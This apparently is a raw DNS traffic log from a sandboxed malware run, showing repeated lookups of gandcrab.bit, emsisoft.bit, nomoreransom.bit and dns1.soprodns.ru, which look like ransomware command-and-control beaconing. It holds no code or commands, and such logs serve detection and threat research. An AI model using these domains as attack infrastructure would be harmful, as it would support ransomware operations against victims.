                                    Sep 1, 2022 00:02:32.423641920 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:32.443413973 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:32.467434883 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:32.489443064 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:32.867223024 CEST192.168.2.38.8.8.80x4560Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:33.862488031 CEST192.168.2.38.8.8.80x4560Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:34.417866945 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:34.435885906 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:34.463043928 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:34.497220993 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:34.518929958 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:34.851964951 CEST192.168.2.38.8.8.80xbc32Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:35.437273979 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:35.455212116 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:35.476502895 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:35.496675014 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:35.516824961 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:35.859457016 CEST192.168.2.38.8.8.80x55acStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:35.995635033 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:36.017096996 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:36.035378933 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:36.053729057 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:36.072251081 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:36.459953070 CEST192.168.2.38.8.8.80xf2bbStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:37.472609997 CEST192.168.2.38.8.8.80xf2bbStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:38.497634888 CEST192.168.2.38.8.8.80xf2bbStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:38.640486956 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:38.660218000 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:38.683294058 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:38.719558001 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:38.738598108 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:39.088742971 CEST192.168.2.38.8.8.80x7eeaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:39.691652060 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:39.711365938 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:39.730597973 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:39.751533031 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:39.772185087 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:40.153419018 CEST192.168.2.38.8.8.80x6727Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:41.172076941 CEST192.168.2.38.8.8.80x6727Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:41.842334986 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:41.862104893 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:41.882664919 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:41.903320074 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:41.921899080 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:42.277318001 CEST192.168.2.38.8.8.80x27eeStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:43.285449982 CEST192.168.2.38.8.8.80x27eeStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:43.328716993 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:43.346779108 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:43.367193937 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:43.387386084 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:43.405654907 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:43.751919985 CEST192.168.2.38.8.8.80xdd39Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:44.286156893 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:44.306859970 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:44.327136040 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:44.347197056 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:44.367091894 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:44.774935961 CEST192.168.2.38.8.8.80x7cf8Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:44.827179909 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:44.846894979 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:44.867082119 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:44.887150049 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:44.909322977 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:45.564925909 CEST192.168.2.38.8.8.80xa05dStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:46.551074982 CEST192.168.2.38.8.8.80xa05dStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:46.632401943 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:46.656883001 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:46.678054094 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:46.696702003 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:46.717207909 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:47.066291094 CEST192.168.2.38.8.8.80xb75eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:47.102243900 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:47.119975090 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:47.139273882 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:47.160135031 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:47.180254936 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:48.143838882 CEST192.168.2.38.8.8.80x9344Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:48.243660927 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:48.263272047 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:48.283085108 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:48.340517998 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:48.360270023 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:48.992279053 CEST192.168.2.38.8.8.80x9098Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:49.039655924 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:49.105935097 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:49.126044989 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:49.146584034 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:49.211679935 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:50.544686079 CEST192.168.2.38.8.8.80xc31fStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:52.608259916 CEST192.168.2.38.8.8.80xc31fStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:52.628920078 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:52.648139954 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:52.669550896 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:52.691628933 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:52.764321089 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:53.163081884 CEST192.168.2.38.8.8.80xddd1Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:53.207458973 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:53.228133917 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:53.250638962 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:53.276937962 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:53.296910048 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:53.660832882 CEST192.168.2.38.8.8.80x1ccaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:54.678829908 CEST192.168.2.38.8.8.80x1ccaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:54.715509892 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:54.735838890 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:54.755738974 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:54.777870893 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:54.805593014 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:55.193733931 CEST192.168.2.38.8.8.80x7331Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:55.231367111 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:55.260307074 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:55.282820940 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:55.304130077 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:55.325848103 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:55.844996929 CEST192.168.2.38.8.8.80x8ac0Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:55.932115078 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:55.953111887 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:55.974494934 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:55.995863914 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:56.017085075 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:56.404357910 CEST192.168.2.38.8.8.80xc34eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:57.411904097 CEST192.168.2.38.8.8.80xc34eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:57.447629929 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:02:57.467935085 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:57.492444992 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:57.512286901 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:57.542714119 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:02:57.924940109 CEST192.168.2.38.8.8.80xe6aaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:58.928544044 CEST192.168.2.38.8.8.80xe6aaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:02:59.943011045 CEST192.168.2.38.8.8.80xe6aaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:00.017366886 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:00.036817074 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:00.057399988 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:00.076893091 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:00.100399017 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:00.563648939 CEST192.168.2.38.8.8.80x1eaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:01.554763079 CEST192.168.2.38.8.8.80x1eaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:01.601682901 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:01.623106956 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:01.644612074 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:01.665771961 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:01.687030077 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:02.153387070 CEST192.168.2.38.8.8.80x9670Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:02.801975012 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:02.822494030 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:02.844405890 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:02.900983095 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:02.922605991 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:03.343214035 CEST192.168.2.38.8.8.80x101cStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:03.427838087 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:03.448040962 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:03.466197014 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:03.486265898 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:03.506251097 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:03.962084055 CEST192.168.2.38.8.8.80x1236Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:04.974921942 CEST192.168.2.38.8.8.80x1236Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:05.594440937 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:05.617213011 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:05.639385939 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:05.661525011 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:05.683602095 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:06.123651028 CEST192.168.2.38.8.8.80x32f7Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:06.260365963 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:06.280270100 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:06.300781012 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:06.319112062 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:06.339869022 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:06.701911926 CEST192.168.2.38.8.8.80xf50dStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:07.240674019 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:07.276021957 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:07.301197052 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:07.325311899 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:07.346616983 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:08.098186970 CEST192.168.2.38.8.8.80x5b1cStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:08.720036983 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:08.745096922 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:08.807703018 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:08.828383923 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:08.846909046 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:11.312613964 CEST192.168.2.38.8.8.80xb93eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:13.124238968 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:13.145962954 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:13.168036938 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:13.188986063 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:13.209944010 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:13.699589014 CEST192.168.2.38.8.8.80x78aaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:14.710131884 CEST192.168.2.38.8.8.80x78aaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:15.711199999 CEST192.168.2.38.8.8.80x78aaStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:15.883177996 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:15.903464079 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:15.922110081 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:15.942186117 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:15.960644960 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:16.393064976 CEST192.168.2.38.8.8.80xd2e7Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:17.397872925 CEST192.168.2.38.8.8.80xd2e7Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:18.001125097 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:18.020601034 CEST192.168.2.38.8.8.80x2Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:18.040652990 CEST192.168.2.38.8.8.80x3Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:18.060822964 CEST192.168.2.38.8.8.80x4Standard query (0)emsisoft.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:18.082511902 CEST192.168.2.38.8.8.80x5Standard query (0)emsisoft.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:18.621407986 CEST192.168.2.38.8.8.80xe3b2Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:18.657192945 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:18.677170992 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:18.697258949 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                    Sep 1, 2022 00:03:18.717463970 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:18.737468004 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
